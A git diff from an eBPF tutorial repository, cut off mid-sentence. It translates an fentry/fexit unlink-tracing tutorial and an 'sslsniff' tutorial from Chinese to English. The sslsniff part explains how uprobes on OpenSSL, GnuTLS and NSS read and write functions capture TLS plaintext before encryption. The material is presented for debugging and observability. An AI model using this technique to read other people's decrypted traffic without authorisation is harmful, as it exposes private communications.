fentry 捕获 unlink 系统调用。 + +## Fentry + +fentry(function entry)和 fexit(function exit)是 eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在 Linux 内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。 + +与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。 + +```c +#include "vmlinux.h" +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("fentry/do_unlinkat") +int BPF_PROG(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name); + return 0; +} + +SEC("fexit/do_unlinkat") +int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret); + return 0; +} +``` + +这段程序是用 C 语言编写的 eBPF(扩展的伯克利包过滤器)程序,它使用 BPF 的 fentry 和 fexit 探针来跟踪 Linux 内核函数 `do_unlinkat`。在这个教程中,我们将以这段程序作为示例,让您学会如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 + +程序包含以下部分: + +1. 包含头文件:包括 vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。 +2. 定义许可证:这里定义了一个名为 `LICENSE` 的字符数组,包含许可证信息“Dual BSD/GPL”。 +3. 定义 fentry 探针:我们定义了一个名为 `BPF_PROG(do_unlinkat)` 的 fentry 探针,该探针在 `do_unlinkat` 函数的入口处被触发。这个探针获取当前进程的 PID(进程ID)并将其与文件名一起打印到内核日志。 +4. 定义 fexit 探针:我们还定义了一个名为 `BPF_PROG(do_unlinkat_exit)` 的 fexit 探针,该探针在 `do_unlinkat` 函数的退出处被触发。与 fentry 探针类似,这个探针也会获取当前进程的 PID 并将其与文件名和返回值一起打印到内核日志。 + +通过这个示例,您可以学习如何在 eBPF 中使用 fentry 和 fexit 探针来监控和捕获内核函数调用,例如在本教程中的 unlink 系统调用。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```console +$ ecc fentry-link.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... +``` + +在另外一个窗口中: + +```shell +touch test_file +rm test_file +touch test_file2 +rm test_file2 +``` + +运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file + rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0 + rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2 + rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0 +``` + +## 总结 + +这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 `do_unlinkat` 和 `do_unlinkat_exit` 函数,并通过使用 `bpf_get_current_pid_tgid` 和 `bpf_printk` 函数获取调用 do_unlinkat 的进程的 ID、文件名和返回值,并在内核日志中打印出来。 + +编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/3-fentry-unlink/README_en.md b/src/3-fentry-unlink/README_en.md deleted file mode 100644 index 015f9ae..0000000 --- a/src/3-fentry-unlink/README_en.md +++ /dev/null @@ -1,87 +0,0 @@ -# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel. - -This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF. - -## Fentry - -fentry (function entry) and fexit (function exit) are two types of probes in eBPF (Extended Berkeley Packet Filter) used for tracing at the entry and exit points of Linux kernel functions. They allow developers to collect information, modify parameters, or observe return values at specific stages of kernel function execution. This tracing and monitoring functionality is very useful in performance analysis, troubleshooting, and security analysis scenarios. - -Compared to kprobes, fentry and fexit programs have higher performance and availability. In this example, we can directly access the pointers to the functions' parameters, just like in regular C code, without needing various read helpers. The main difference between fexit and kretprobe programs is that fexit programs can access both the input parameters and return values of a function, while kretprobe programs can only access the return value. Starting from the 5.5 kernel, fentry and fexit are available for eBPF programs. - -```c -#include "vmlinux.h" -#include -#include - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("fentry/do_unlinkat") -int BPF_PROG(do_unlinkat, int dfd, struct filename *name) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name); - return 0; -} - -SEC("fexit/do_unlinkat") -int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret); - return 0; -} -``` - -This program is an eBPF (Extended Berkeley Packet Filter) program written in the C language. It uses BPF fentry and fexit probes to trace the Linux kernel function `do_unlinkat`. In this tutorial, we will use this program as an example to learn how to use fentry in eBPF to detect and capture unlink system calls. - -The program consists of the following parts: - -1. Include header files: including vmlinux.h (for accessing kernel data structures), bpf/bpf_helpers.h (which includes eBPF helper functions), bpf/bpf_tracing.h (for eBPF tracing-related functionalities). -2. Define license: Here, a character array named `LICENSE` is defined, containing the license information "Dual BSD/GPL". -3. Define fentry probe: We define an fentry probe named `BPF_PROG(do_unlinkat)` that is triggered at the entry point of the `do_unlinkat` function. This probe retrieves the PID (Process ID) of the current process and prints it along with the filename to the kernel log. -4. Define fexit probe: We also define an fexit probe named `BPF_PROG(do_unlinkat_exit)` that is triggered at the exit point of the `do_unlinkat` function. Similar to the fentry probe, this probe also retrieves the PID of the current process and prints it along with the filename and return value to the kernel log. - -Through this example, you can learn how to use fentry and fexit probes in eBPF to monitor and capture kernel function calls, such as the unlink system call in this tutorial. "eunomia-bpf is an open source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its goal is to simplify the development, building, distribution, and running of eBPF programs. You can refer to [here](https://github.com/eunomia-bpf/eunomia-bpf) to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -To compile and run the above code: - -```console -$ ecc fentry-link.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -In another window: - -```shell -touch test_file -rm test_file -touch test_file2 -rm test_file2 -``` - -After running this program, you can view the output of the eBPF program by examining the `/sys/kernel/debug/tracing/trace_pipe` file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file - rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0 - rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2 - rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0 -``` - -## Summary - -This program is an eBPF program that captures the `do_unlinkat` and `do_unlinkat_exit` functions using fentry and fexit, and uses `bpf_get_current_pid_tgid` and `bpf_printk` functions to obtain the ID, filename, and return value of the process calling do_unlinkat, and print them in the kernel log. - -To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. - -If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/30-sslsniff/README.md b/src/30-sslsniff/README.md index aea36bb..c1b8dcf 100644 --- a/src/30-sslsniff/README.md +++ b/src/30-sslsniff/README.md @@ -1,115 +1,115 @@ -# eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据 +# eBPF Practical Tutorial: Capturing SSL/TLS Plain Text Data Using uprobe -随着TLS在现代网络环境中的广泛应用,跟踪微服务RPC消息已经变得愈加棘手。传统的流量嗅探技术常常受限于只能获取到加密后的数据,导致无法真正观察到通信的原始内容。这种限制为系统的调试和分析带来了不小的障碍。 +With the widespread use of TLS in modern network environments, tracing microservices RPC messages has become increasingly challenging. Traditional traffic sniffing techniques often face limitations in accessing only encrypted data, preventing a genuine observation of the original communication content. This restriction poses significant obstacles to system debugging and analysis. -但现在,我们有了新的解决方案。使用 eBPF 技术,通过其能力在用户空间进行探测,提供了一种方法重新获得明文数据,使得我们可以直观地查看加密前的通信内容。然而,每个应用可能使用不同的库,每个库都有多个版本,这种多样性给跟踪带来了复杂性。 +However, a new solution is now available. Through the use of eBPF technology and its capability to perform probing in user space, a method has emerged to regain plain text data, allowing us to intuitively view the pre-encrypted communication content. Nevertheless, each application might utilize different libraries, and each library comes in multiple versions, introducing complexity to the tracking process. -在本教程中,我们将带您了解一种跨多种用户态 SSL/TLS 库的 eBPF 追踪技术,它不仅可以同时跟踪 GnuTLS 和 OpenSSL 等用户态库,而且相比以往,大大降低了对新版本库的维护工作。完整的源代码可以在这里查看:。 +In this tutorial, we will guide you through an eBPF tracing technique that spans across various user-space SSL/TLS libraries. This technique not only allows simultaneous tracing of user-space libraries like GnuTLS and OpenSSL but also significantly reduces maintenance efforts for new library versions compared to previous methods. The complete code for this tutorial can be found in <完整的源代码可以在这里查看: -## 背景知识 +## Background Knowledge -在深入本教程的主题之前,我们需要理解一些核心概念,这些概念将为我们后面的讨论提供基础。 +Before delving into the main topic of this tutorial, we need to grasp some core concepts that will serve as the foundation for our subsequent discussions. -### SSL 和 TLS +### SSL and TLS -SSL (Secure Sockets Layer): 由 Netscape 在 1990 年代早期开发,为网络上的两台机器之间提供数据加密传输。然而,由于某些已知的安全问题,SSL的使用已被其后继者TLS所替代。 +SSL (Secure Sockets Layer): Developed by Netscape in the early 1990s, SSL provides data encryption for communication between two machines on a network. However, due to known security vulnerabilities, SSL has been succeeded by its successor, TLS. -TLS (Transport Layer Security): 是 SSL 的继任者,旨在提供更强大和更安全的数据加密方式。TLS 工作通过一个握手过程,在这个过程中,客户端和服务器之间会选择一个加密算法和相应的密钥。一旦握手完成,数据传输开始,所有数据都使用选择的算法和密钥加密。 +TLS (Transport Layer Security): TLS is the successor to SSL, aiming to provide stronger and more secure data encryption methods. TLS operates through a handshake process during which a client and a server select an encryption algorithm and corresponding keys. Once the handshake is complete, data transmission begins, with all data being encrypted using the chosen algorithm and keys. -### TLS 的工作原理 +### Operation Principles of TLS -Transport Layer Security (TLS) 是一个密码学协议,旨在为计算机网络上的通信提供安全性。它主要目标是通过密码学,例如证书的使用,为两个或更多通信的计算机应用程序提供安全性,包括隐私(机密性)、完整性和真实性。TLS 由两个子层组成:TLS 记录协议和TLS 握手协议。 +Transport Layer Security (TLS) is a cryptographic protocol designed to provide security for communication over computer networks. Its primary goal is to provide security, including privacy (confidentiality), integrity, and authenticity, for two or more communicating computer applications over a network using cryptography, such as certificates. TLS consists of two sub-layers: the TLS Record Protocol and the TLS Handshake Protocol. -#### 握手过程 +#### Handshake Process -当客户端与启用了TLS的服务器连接并请求建立安全连接时,握手过程开始。握手允许客户端和服务器通过不对称密码来建立连接的安全性参数,完整流程如下: +When a client connects to a TLS-enabled server and requests a secure connection, the handshake process begins. The handshake allows the client and server to establish security parameters for the connection using asymmetric cryptography. The complete process is as follows: -1. **初始握手**:客户端连接到启用了TLS的服务器,请求安全连接,并提供它支持的密码套件列表(加密算法和哈希函数)。 -2. **选择密码套件**:从提供的列表中,服务器选择它也支持的密码套件和哈希函数,并通知客户端已做出的决定。 -3. **提供数字证书**:通常,服务器接下来会提供形式为数字证书的身份验证。此证书包含服务器名称、信任的证书授权机构(为证书的真实性提供担保)以及服务器的公共加密密钥。 -4. **验证证书**:客户端在继续之前确认证书的有效性。 -5. **生成会话密钥**:为了生成用于安全连接的会话密钥,客户端有以下两种方法: - - 使用服务器的公钥加密一个随机数(PreMasterSecret)并将结果发送到服务器(只有服务器才能使用其私钥解密);双方然后使用该随机数生成一个独特的会话密钥,用于会话期间的数据加密和解密。 - - 使用 Diffie-Hellman 密钥交换(或其变体椭圆曲线DH)来安全地生成一个随机且独特的会话密钥,用于加密和解密,该密钥具有前向保密的额外属性:即使在未来公开了服务器的私钥,也不能用它来解密当前的会话,即使第三方拦截并记录了会话。 +1. **Initial Handshake**: The client connects to the TLS-enabled server, requests a secure connection, and provides a list of supported cipher suites (encryption algorithms and hash functions). +2. **Selecting Cipher Suite**: From the provided list, the server chooses a cipher suite and hash function it also supports and notifies the client of the decision. +3. **Providing Digital Certificate**: Usually, the server then provides identity authentication in the form of a digital certificate. This certificate includes the server's name, trusted certificate authorities (guaranteeing the certificate's authenticity), and the server's public encryption key. +4. **Certificate Verification**: The client verifies the certificate's validity before proceeding. +5. **Generating Session Key**: To create a session key for a secure connection, the client has two methods: + - Encrypt a random number (PreMasterSecret) with the server's public key and send the result to the server (only the server can decrypt it with its private key); both parties then use this random number to generate a unique session key for encrypting and decrypting data during the session. + - Use Diffie-Hellman key exchange (or its variant, Elliptic Curve DH) to securely generate a random and unique session key for encryption and decryption. This key has the additional property of forward secrecy: even if the server's private key is exposed in the future, it can't be used to decrypt the current session, even if a third party intercepts and records the session. -一旦上述步骤成功完成,握手过程便结束,加密的连接开始。此连接使用会话密钥进行加密和解密,直到连接关闭。如果上述任何步骤失败,则TLS握手失败,连接将不会建立。 +Once these steps are successfully completed, the handshake process concludes, and the encrypted connection begins. This connection uses the session key for encryption and decryption until the connection is closed. If any of the above steps fail, the TLS handshake fails, and the connection won't be established. -#### OSI模型中的TLS +#### TLS in the OSI Model -TLS 和 SSL 不完全适合 OSI 模型或 TCP/IP 模型的任何单一层次。TLS 在“某些可靠的传输协议(例如,TCP)之上运行”,这意味着它位于传输层之上。它为更高的层提供加密,这通常是表示层的功能。但是,使用TLS 的应用程序通常视其为传输层,即使使用TLS的应用程序必须积极控制启动 TLS 握手和交换的认证证书的处理。 +TLS and SSL don't perfectly align with any single layer of the OSI model or the TCP/IP model. TLS "runs over some reliable transport protocol (such as TCP)," which means it sits above the transport layer. It provides encryption for higher layers, typically the presentation layer. However, applications using TLS often consider it the transport layer, even though applications using TLS must actively control the initiation of TLS handshakes and the handling of exchanged authentication certificates. -### eBPF 和 uprobe +### eBPF and uprobes -eBPF (Extended Berkeley Packet Filter): 是一种内核技术,允许用户在内核空间中运行预定义的程序,不需要修改内核源代码或重新加载模块。它创建了一个桥梁,使得用户空间和内核空间可以交互,从而为系统监控、性能分析和网络流量分析等任务提供了无前例的能力。 +eBPF (Extended Berkeley Packet Filter): It's a kernel technology that allows users to run predefined programs in the kernel space without modifying kernel source code or reloading modules. It creates a bridge that enables interaction between user space and kernel space, providing unprecedented capabilities for tasks like system monitoring, performance analysis, and network traffic analysis. -uprobes 是eBPF的一个重要特性,允许我们在用户空间应用程序中动态地插入探测点,特别适用于跟踪SSL/TLS库中的函数调用。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +uprobes are a significant feature of eBPF, allowing dynamic insertion of probe points in user space applications, particularly useful for tracking function calls in SSL/TLS libraries. Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs. bpftime can have a performance overhead that is one order of magnitude smaller than that of kernel mode eBPF. -### 用户态库 +### User-Space Libraries -SSL/TLS协议的实现主要依赖于用户态库。以下是一些常见的库: +The implementation of the SSL/TLS protocol heavily relies on user-space libraries. Here are some common ones: -- OpenSSL: 一个开源的、功能齐全的加密库,广泛应用于许多开源和商业项目中。 -- BoringSSL: 是Google维护的OpenSSL的一个分支,重点是简化和优化,适用于Google的需求。 -- GnuTLS: 是GNU项目的一部分,提供了SSL,TLS和DTLS协议的实现。与OpenSSL和BoringSSL相比,GnuTLS在API设计、模块结构和许可证上有所不同。 +- OpenSSL: An open-source, feature-rich cryptographic library widely used in many open-source and commercial projects. +- BoringSSL: A fork of OpenSSL maintained by Google, focusing on simplification and optimization for Google's needs. +- GnuTLS: Part of the GNU project, offering an implementation of SSL, TLS, and DTLS protocols. GnuTLS differs from OpenSSL and BoringSSL in API design, module structure, and licensing. -## OpenSSL API 分析 +## OpenSSL API Analysis -OpenSSL 是一个广泛应用的开源库,提供了 SSL 和 TLS 协议的完整实现,并广泛用于各种应用程序中以确保数据传输的安全性。其中,SSL_read() 和 SSL_write() 是两个核心的 API 函数,用于从 TLS/SSL 连接中读取和写入数据。本章节,我们将深入这两个函数,帮助你理解其工作机制。 +OpenSSL is a widely used open-source library providing a complete implementation of the SSL and TLS protocols, ensuring data transmission security in various applications. Among its functions, SSL_read() and SSL_write() are two core API functions for reading from and writing to TLS/SSL connections. In this section, we'll delve into these functions to help you understand their mechanisms. -### 1. SSL_read 函数 +### 1. SSL_read Function -当我们想从一个已建立的 SSL 连接中读取数据时,可以使用 `SSL_read` 或 `SSL_read_ex` 函数。函数原型如下: +When we want to read data from an established SSL connection, we can use the `SSL_read` or `SSL_read_ex` function. The function prototype is as follows: ```c int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); int SSL_read(SSL *ssl, void *buf, int num); ``` -`SSL_read` 和 `SSL_read_ex` 试图从指定的 `ssl` 中读取最多 `num` 字节的数据到缓冲区 `buf` 中。成功时,`SSL_read_ex` 会在 `*readbytes` 中存储实际读取到的字节数。 +`SSL_read` and `SSL_read_ex` attempt to read up to `num` bytes of data from the specified `ssl` into the buffer `buf`. Upon success, `SSL_read_ex` stores the actual number of read bytes in `*readbytes`. -### 2. SSL_write 函数 +### 2. Function SSL_write -当我们想往一个已建立的 SSL 连接中写入数据时,可以使用 `SSL_write` 或 `SSL_write_ex` 函数。 +When we want to write data into an established SSL connection, we can use the `SSL_write` or `SSL_write_ex` functions. -函数原型: +Function prototype: ```c int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); int SSL_write(SSL *ssl, const void *buf, int num); ``` -`SSL_write` 和 `SSL_write_ex` 会从缓冲区 `buf` 中将最多 `num` 字节的数据写入到指定的 `ssl` 连接中。成功时,`SSL_write_ex` 会在 `*written` 中存储实际写入的字节数。 +`SSL_write` and `SSL_write_ex` will write up to `num` bytes of data from the buffer `buf` into the specified `ssl` connection. Upon success, `SSL_write_ex` will store the actual number of written bytes in `*written`. -## eBPF 内核态代码编写 +## Writing eBPF Kernel Code -在我们的例子中,我们使用 eBPF 来 hook ssl_read 和 ssl_write 函数,从而在数据读取或写入 SSL 连接时执行自定义操作。 +In our example, we use eBPF to hook the `ssl_read` and `ssl_write` functions to perform custom actions when data is read from or written to an SSL connection. -### 数据结构 +### Data Structures -首先,我们定义了一个数据结构 probe_SSL_data_t 用于在内核态和用户态之间传输数据: +Firstly, we define a data structure `probe_SSL_data_t` to transfer data between kernel and user space: ```c #define MAX_BUF_SIZE 8192 #define TASK_COMM_LEN 16 struct probe_SSL_data_t { - __u64 timestamp_ns; // 时间戳(纳秒) - __u64 delta_ns; // 函数执行时间 - __u32 pid; // 进程 ID - __u32 tid; // 线程 ID - __u32 uid; // 用户 ID - __u32 len; // 读/写数据的长度 - int buf_filled; // 缓冲区是否填充完整 - int rw; // 读或写(0为读,1为写) - char comm[TASK_COMM_LEN]; // 进程名 - __u8 buf[MAX_BUF_SIZE]; // 数据缓冲区 - int is_handshake; // 是否是握手数据 + __u64 timestamp_ns; // Timestamp (nanoseconds) + __u64 delta_ns; // Function execution time + __u32 pid; // Process ID + __u32 tid; // Thread ID + __u32 uid; // User ID + __u32 len; // Length of read/write data + int buf_filled; // Whether buffer is filled completely + int rw; // Read or Write (0 for read, 1 for write) + char comm[TASK_COMM_LEN]; // Process name + __u8 buf[MAX_BUF_SIZE]; // Data buffer + int is_handshake; // Whether it's handshake data }; ``` -### Hook 函数 +### Hook Functions -我们的目标是 hook 到 `SSL_read` 和 `SSL_write` 函数。我们定义了一个函数 `SSL_exit` 来处理这两个函数的返回值。该函数会根据当前进程和线程的 ID,确定是否需要追踪并收集数据。 +Our goal is to hook into the `SSL_read` and `SSL_write` functions. We define a function `SSL_exit` to handle the return values of these two functions. This function determines whether to trace and collect data based on the current process and thread IDs. ```c static int SSL_exit(struct pt_regs *ctx, int rw) { @@ -173,39 +173,39 @@ static int SSL_exit(struct pt_regs *ctx, int rw) { } ``` -这里的 `rw` 参数标识是读还是写。0 代表读,1 代表写。 +The `rw` parameter here indicates whether it's a read or write operation. 0 represents read, and 1 represents write. -#### 数据收集流程 +#### Data Collection Process -1. 获取当前进程和线程的 ID,以及当前用户的 ID。 -2. 通过 `trace_allowed` 判断是否允许追踪该进程。 -3. 获取起始时间,以计算函数的执行时间。 -4. 尝试从 `bufs` 和 `start_ns` maps 中查找相关的数据。 -5. 如果成功读取了数据,则创建或查找 `probe_SSL_data_t` 结构来填充数据。 -6. 将数据从用户空间复制到缓冲区,并确保不超过预定的大小。 -7. 最后,将数据发送到用户空间。 +1. Obtain the ID of the current process and thread, along with the ID of the current user. +2. Use `trace_allowed` to determine if tracing is allowed for this process. +3. Get the start time to calculate the execution time of the function. +4. Attempt to retrieve relevant data from the `bufs` and `start_ns` maps. +5. If data retrieval is successful, create or locate a `probe_SSL_data_t` structure to populate the data. +6. Copy the data from user space to the buffer, ensuring it doesn't exceed the designated size. +7. Finally, send the data to user space. -注意:我们使用了两个用户返回探针 `uretprobe` 来分别 hook `SSL_read` 和 `SSL_write` 的返回: +Note: We use two user-level return probes `uretprobe` to respectively hook the returns of `SSL_read` and `SSL_write`: ```c SEC("uretprobe/SSL_read") int BPF_URETPROBE(probe_SSL_read_exit) { - return (SSL_exit(ctx, 0)); // 0 表示读操作 + return (SSL_exit(ctx, 0)); // 0 indicates read operation } SEC("uretprobe/SSL_write") int BPF_URETPROBE(probe_SSL_write_exit) { - return (SSL_exit(ctx, 1)); // 1 表示写操作 + return (SSL_exit(ctx, 1)); // 1 indicates write operation } ``` -### Hook到握手过程 +### Hooking into the Handshake Process -在 SSL/TLS 中,握手(handshake)是一个特殊的过程,用于在客户端和服务器之间建立安全的连接。为了分析此过程,我们 hook 到了 `do_handshake` 函数,以跟踪握手的开始和结束。 +In SSL/TLS, the handshake is a special process used to establish a secure connection between a client and a server. To analyze this process, we hook into the `do_handshake` function to track the start and end of the handshake. -#### 进入握手 +#### Entering the Handshake -我们使用 `uprobe` 为 `do_handshake` 设置一个 probe: +We use a `uprobe` to set a probe for the `do_handshake` function: ```c @@ -227,15 +227,25 @@ int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { } ``` -这段代码的主要功能如下: +The main functionality of this code is as follows: -1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 -2. 使用 `trace_allowed` 检查进程是否被允许追踪。 -3. 将当前时间戳存储在 `start_ns` 映射中,用于稍后计算握手过程的持续时间。 +1. Obtain the current `pid`, `tid`, `ts`, and `uid`. +2. Use `trace_allowed` to verify if the process is allowed to be traced. +3. Store the current timestamp in the `start_ns` map, which will be used to calculate the duration of the handshake process later. -#### 退出握手 +#### Exiting the Handshake -同样,我们为 `do_handshake` 的返回设置了一个 `uretprobe`: +Similarly, we've set a `uretprobe` for the return of `do_handshake`: + +```c +SEC("uretprobe/do_handshake") +int BPF_URETPROBE(handle_do_handshake_exit) { + // Code to execute upon exiting the do_handshake function. + return 0; +} +``` + +In this context, the `uretprobe` will execute the provided code when the `do_handshake` function exits. ```c @@ -287,29 +297,29 @@ int BPF_URETPROBE(probe_SSL_do_handshake_exit) { } ``` -此函数的逻辑如下: +Logic of this Function: -1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 -2. 使用 `trace_allowed` 再次检查是否允许追踪。 -3. 查找 `start_ns` 映射中的时间戳,用于计算握手的持续时间。 -4. 使用 `PT_REGS_RC(ctx)` 获取 `do_handshake` 的返回值,判断握手是否成功。 -5. 查找或初始化与当前线程关联的 `probe_SSL_data_t` 数据结构。 -6. 更新数据结构的字段,包括时间戳、持续时间、进程信息等。 -7. 通过 `bpf_perf_event_output` 将数据发送到用户态。 +1. Obtain the current `pid`, `tid`, `ts`, and `uid`. +2. Use `trace_allowed` to recheck if tracing is allowed. +3. Look up the timestamp in the `start_ns` map for calculating handshake duration. +4. Use `PT_REGS_RC(ctx)` to get the return value of `do_handshake` and determine if the handshake was successful. +5. Find or initialize the `probe_SSL_data_t` data structure associated with the current thread. +6. Update the data structure's fields, including timestamp, duration, process information, etc. +7. Use `bpf_perf_event_output` to send the data to user space. -我们的 eBPF 代码不仅跟踪了 `ssl_read` 和 `ssl_write` 的数据传输,还特别关注了 SSL/TLS 的握手过程。这些信息对于深入了解和优化安全连接的性能至关重要。 +Our eBPF code not only tracks data transmission for `ssl_read` and `ssl_write` but also focuses on the SSL/TLS handshake process. This information is crucial for a deeper understanding and optimization of the performance of secure connections. -通过这些 hook 函数,我们可以获得关于握手成功与否、握手所需的时间以及相关的进程信息的数据。这为我们提供了关于系统 SSL/TLS 行为的深入见解,可以帮助我们在需要时进行更深入的分析和优化。 +Through these hook functions, we can obtain data regarding the success of the handshake, the time taken for the handshake, and related process information. This provides us with insights into the behavior of the system's SSL/TLS, enabling us to perform more in-depth analysis and optimization when necessary. -## 用户态辅助代码分析与解读 +## User-Space Assisted Code Analysis and Interpretation -在 eBPF 的生态系统中,用户态和内核态代码经常协同工作。内核态代码负责数据的采集,而用户态代码则负责设置、管理和处理这些数据。在本节中,我们将解读上述用户态代码如何配合 eBPF 追踪 SSL/TLS 交互。 +In the eBPF ecosystem, user-space and kernel-space code often work in collaboration. Kernel-space code is responsible for data collection, while user-space code manages, processes, and handles this data. In this section, we will explain how the above user-space code collaborates with eBPF to trace SSL/TLS interactions. -### 1. 支持的库挂载 +### 1. Supported Library Attachment -上述代码片段中,根据环境变量 `env` 的设定,程序可以选择针对三种常见的加密库(OpenSSL、GnuTLS 和 NSS)进行挂载。这意味着我们可以在同一个工具中对多种库的调用进行追踪。 +In the provided code snippet, based on the setting of the `env` environment variable, the program can choose to attach to three common encryption libraries (OpenSSL, GnuTLS, and NSS). This means that we can trace calls to multiple libraries within the same tool. -为了实现这一功能,首先利用 `find_library_path` 函数确定库的路径。然后,根据库的类型,调用对应的 `attach_` 函数来将 eBPF 程序挂载到库函数上。 +To achieve this functionality, the `find_library_path` function is first used to determine the library's path. Then, depending on the library type, the corresponding `attach_` function is called to attach the eBPF program to the library function. ```c if (env.openssl) { @@ -329,11 +339,11 @@ int BPF_URETPROBE(probe_SSL_do_handshake_exit) { } ``` -这里主要包含 OpenSSL、GnuTLS 和 NSS 三个库的挂载逻辑。NSS 是为组织设计的一套安全库,支持创建安全的客户端和服务器应用程序。它们最初是由 Netscape 开发的,现在由 Mozilla 维护。其他两个库前面已经介绍过了,这里不再赘述。 +This section primarily covers the attachment logic for the OpenSSL, GnuTLS, and NSS libraries. NSS is a set of security libraries designed for organizations, supporting the creation of secure client and server applications. Originally developed by Netscape, they are now maintained by Mozilla. The other two libraries have been introduced earlier and are not reiterated here. -### 2. 详细挂载逻辑 +### 2. Detailed Attachment Logic -具体的 attach 函数如下: +The specific `attach` functions are as follows: ```c #define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ @@ -383,26 +393,26 @@ int attach_nss(struct sslsniff_bpf *skel, const char *lib) { } ``` -我们进一步观察 `attach_` 函数,可以看到它们都使用了 `ATTACH_UPROBE_CHECKED` 和 `ATTACH_URETPROBE_CHECKED` 宏来实现具体的挂载逻辑。这两个宏分别用于设置 uprobe(函数入口)和 uretprobe(函数返回)。 +We further examine the `attach_` function and can see that they both use the `ATTACH_UPROBE_CHECKED` and `ATTACH_URETPROBE_CHECKED` macros to implement specific mounting logic. These two macros are used respectively for setting uprobe (function entry) and uretprobe (function return). -考虑到不同的库有不同的 API 函数名称(例如,OpenSSL 使用 `SSL_write`,而 GnuTLS 使用 `gnutls_record_send`),所以我们需要为每个库写一个独立的 `attach_` 函数。 +Considering that different libraries have different API function names (for example, OpenSSL uses `SSL_write`, while GnuTLS uses `gnutls_record_send`), we need to write a 